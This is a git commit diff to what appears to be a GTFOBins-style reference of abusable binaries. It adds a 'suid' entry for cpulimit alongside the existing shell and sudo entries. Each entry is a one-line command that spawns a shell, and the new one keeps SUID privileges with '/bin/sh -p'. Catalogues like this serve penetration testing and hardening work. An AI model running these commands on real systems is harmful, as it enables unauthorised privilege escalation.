add suid function to cpulimit

master
Mr. Robot 3 years ago committed by GitHub
parent 199b4df1cd
commit 463e7ce77e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

@ -5,10 +5,15 @@
"code": "cpulimit -l 100 -f /bin/sh" "code": "cpulimit -l 100 -f /bin/sh"
} }
], ],
"suid": [
{
"code": "./cpulimit -l 100 -f -- /bin/sh -p"
}
],
"sudo": [ "sudo": [
{ {
"code": "sudo cpulimit -l 100 -f /bin/sh" "code": "sudo cpulimit -l 100 -f /bin/sh"
} }
] ]
} }
} }

Loading…
Cancel
Save